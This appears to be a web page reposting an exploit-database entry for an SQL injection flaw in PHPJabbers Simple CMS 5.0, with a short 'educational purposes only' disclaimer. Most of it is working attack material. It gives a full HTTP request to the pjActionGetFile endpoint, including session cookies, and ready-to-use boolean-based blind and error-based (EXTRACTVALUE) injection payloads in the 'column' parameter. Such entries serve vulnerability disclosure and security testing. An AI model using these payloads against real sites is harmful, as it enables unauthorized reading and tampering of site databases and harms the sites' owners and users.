Phpjabbers simple cms 5.0 sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-05-02 | Type : webapps | Platform : php
This exploit / vulnerability Phpjabbers simple cms 5.0 sql injection is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Request ###

GET
/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
HTTP/1.1
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/simplecms/preview.php?lid=1
Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;
_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;
pjd_simplecms=1; last_position=%2F
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

### Parameter & Payloads ###

Parameter: column (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)
THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)
END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: action=pjActionGetFile&column=2 AND
EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT
(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10